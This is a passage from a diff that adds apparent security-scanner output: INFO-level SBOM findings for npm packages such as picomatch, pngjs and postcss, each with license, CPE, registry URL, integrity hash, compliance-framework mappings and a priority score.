[ + "sbom", + "package" + ], + "raw": { + "id": "f3acb6a3529e1191", + "name": "peberminta", + "version": "0.9.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:peberminta:peberminta:0.9.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/peberminta@0.9.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/peberminta/-/peberminta-0.9.0.tgz", + "integrity": "sha512-XIxfHpEuSJbITd1H3EeQwpcZbTLHc+VVr8ANI9t5sit565tsI4/xK3KWTUFE2e6QiangUkh3B0jihzmGnNrRsQ==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "bd0577c6ddbc7f17", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: picocolors 1.1.1", + "title": "picocolors 1.1.1", + "description": "Package discovered: picocolors 1.1.1", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "9b208867cdc8b323", + "name": "picocolors", + "version": "1.1.1", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "ISC", + "spdxExpression": "ISC", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:picocolors:picocolors:1.1.1:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/picocolors@1.1.1", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/picocolors/-/picocolors-1.1.1.tgz", + "integrity": "sha512-xceH2snhtb5M9liqDsmEw56le376mTZkEX/jEb/RxNFyegNul7eNslCXP9FDj/Lcu0X8KEyMceP2ntpaHrDEVA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "2e6faecb84cf8a8b", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: picomatch 2.3.2", + "title": "picomatch 2.3.2", + "description": "Package discovered: picomatch 2.3.2", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "0c0ba7fcf7a893f6", + "name": "picomatch", + "version": "2.3.2", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jonschlinkert:picomatch:2.3.2:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/picomatch@2.3.2", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz", + "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "44e51885407159f3", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: picomatch 4.0.4", + "title": "picomatch 4.0.4", + "description": "Package discovered: picomatch 4.0.4", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "09943c54769c1f79", + "name": "picomatch", + "version": "4.0.4", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:jonschlinkert:picomatch:4.0.4:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/picomatch@4.0.4", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-4.0.4.tgz", + "integrity": "sha512-QP88BAKvMam/3NxH6vj2o21R6MjxZUAd6nlwAS/pnGvN9IVLocLHxGYIzFhg6fUQ+5th6P4dv4eW9jX3DSIj7A==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "b7793733f0a92625", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: pify 2.3.0", + "title": "pify 2.3.0", + "description": "Package discovered: pify 2.3.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "93c54feee38dbf96", + "name": "pify", + "version": "2.3.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:pify:pify:2.3.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/pify@2.3.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/pify/-/pify-2.3.0.tgz", + "integrity": "sha512-udgsAY+fTnvv7kI7aaxbqwWNb0AHiB0qBO89PZKPkoTmGOgdbrHDKD+0B2X4uTfJ/FT1R09r9gTsjUjNJotuog==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "0b578240afa70fcd", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: pirates 4.0.7", + "title": "pirates 4.0.7", + "description": "Package discovered: pirates 4.0.7", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "47481e92080dd044", + "name": "pirates", + "version": "4.0.7", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:pirates:pirates:4.0.7:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/pirates@4.0.7", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/pirates/-/pirates-4.0.7.tgz", + "integrity": "sha512-TfySrs/5nm8fQJDcBDuUng3VOUKsd7S+zqvbOTiGXHfxX4wK31ard+hoNuvkicM/2YFzlpDgABOevKSsB4G/FA==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "72750f8253cdf631", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: png-js 2.0.0", + "title": "png-js 2.0.0", + "description": "Package discovered: png-js 2.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "7a0a81fa01919ffb", + "name": "png-js", + "version": "2.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:png-js:png-js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:png-js:png_js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:png_js:png-js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:png_js:png_js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:png:png-js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + }, + { + "cpe": "cpe:2.3:a:png:png_js:2.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/png-js@2.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/png-js/-/png-js-2.0.0.tgz", + "integrity": "sha512-GdzJuUMc6ZSpxFJWVxtOH1bzYHym+TOnveqUjb+VJIbZWbZzyiRGFiKhbiielfpYbgMlhHVhsJ0FTazfuRFkMA==", + "dependencies": { + "fflate": "^0.8.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "017b0d73e37dad2f", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: pngjs 5.0.0", + "title": "pngjs 5.0.0", + "description": "Package discovered: pngjs 5.0.0", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "33a77729322028df", + "name": "pngjs", + "version": "5.0.0", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:pngjs:pngjs:5.0.0:*:*:*:*:*:*:*", + "source": "syft-generated" + } + ], + "purl": "pkg:npm/pngjs@5.0.0", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/pngjs/-/pngjs-5.0.0.tgz", + "integrity": "sha512-40QW5YalBNfQo5yRYmiw7Yz6TKKVr3h6970B2YE+3fQpsWcrbj1PzJgxeJ19DRQjhMbKPIuMY8rFaXc8moolVw==", + "dependencies": null + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "6c2c21065eca2894", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss 8.4.31", + "title": "postcss 8.4.31", + "description": "Package discovered: postcss 8.4.31", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "a519bffcd9b56c6d", + "name": "postcss", + "version": "8.4.31", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss:postcss:8.4.31:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/postcss@8.4.31", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.4.31.tgz", + "integrity": "sha512-PS08Iboia9mts/2ygV3eLpY5ghnUcfLV/EXTOW1E2qYxJKGGBUtNjN76FYHnMs36RmARn41bC0AZmn+rR0OVpQ==", + "dependencies": { + "nanoid": "^3.3.6", + "picocolors": "^1.0.0", + "source-map-js": "^1.0.2" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", + "implementationGroup": "IG1" + }, + { + "control": "7.4", + "title": "Perform Automated Application Patch Management", + "implementationGroup": "IG2" + }, + { + "control": "16.11", + "title": "Leverage Vetted Modules or Services for Application Security Components", + "implementationGroup": "IG2" + } + ], + "nistCsf2_0": [ + { + "function": "IDENTIFY", + "category": "ID.RA", + "subcategory": "ID.RA-1", + "description": "Asset vulnerabilities are identified and documented" + }, + { + "function": "GOVERN", + "category": "GV.SC", + "subcategory": "GV.SC-3", + "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" + } + ], + "pciDss4_0": [ + { + "requirement": "6.3.3", + "description": "Security vulnerabilities are identified and managed", + "priority": "CRITICAL" + }, + { + "requirement": "11.3.1", + "description": "Internal vulnerability scans are performed", + "priority": "HIGH" + } + ], + "mitreAttack": [ + { + "tactic": "Initial Access", + "technique": "T1195", + "techniqueName": "Supply Chain Compromise", + "subtechnique": "T1195.001", + "subtechniqueName": "Compromise Software Dependencies and Development Tools" + } + ] + }, + "priority": { + "priority": 3.333333333333333, + "epss": null, + "epss_percentile": null, + "is_kev": false, + "kev_due_date": null, + "components": { + "severity_score": 1, + "epss_multiplier": 1.0, + "kev_multiplier": 1.0, + "reachability_multiplier": 1.0 + } + } + }, + { + "schemaVersion": "1.2.0", + "id": "87700f6dfcbe47e2", + "ruleId": "SBOM.PACKAGE", + "severity": "INFO", + "tool": { + "name": "syft", + "version": "unknown" + }, + "location": { + "path": "/package-lock.json", + "startLine": 0 + }, + "message": "Package discovered: postcss 8.5.12", + "title": "postcss 8.5.12", + "description": "Package discovered: postcss 8.5.12", + "remediation": "Track and scan dependencies.", + "references": [], + "tags": [ + "sbom", + "package" + ], + "raw": { + "id": "588683a1923c27d7", + "name": "postcss", + "version": "8.5.12", + "type": "npm", + "foundBy": "javascript-lock-cataloger", + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ], + "licenses": [ + { + "value": "MIT", + "spdxExpression": "MIT", + "type": "declared", + "urls": [], + "locations": [ + { + "path": "/package-lock.json", + "accessPath": "/package-lock.json", + "annotations": { + "evidence": "primary" + } + } + ] + } + ], + "language": "javascript", + "cpes": [ + { + "cpe": "cpe:2.3:a:postcss:postcss:8.5.12:*:*:*:*:node.js:*:*", + "source": "nvd-cpe-dictionary" + } + ], + "purl": "pkg:npm/postcss@8.5.12", + "metadataType": "javascript-npm-package-lock-entry", + "metadata": { + "resolved": "https://registry.npmjs.org/postcss/-/postcss-8.5.12.tgz", + "integrity": "sha512-W62t/Se6rA0Az3DfCL0AqJwXuKwBeYg6nOaIgzP+xZ7N5BFCI7DYi1qs6ygUYT6rvfi6t9k65UMLJC+PHZpDAA==", + "dependencies": { + "nanoid": "^3.3.11", + "picocolors": "^1.1.1", + "source-map-js": "^1.2.1" + } + } + }, + "compliance": { + "cisControlsV8_1": [ + { + "control": "7.1", + "title": "Establish and Maintain a Vulnerability Management Process", + "implementationGroup": "IG1" + }, + { + "control": "7.2", + "title": "Establish and Maintain a Remediation Process", + "implementationGroup": "IG1" + }, + { + "control": "7.3", + "title": "Perform Automated Operating System Patch Management", 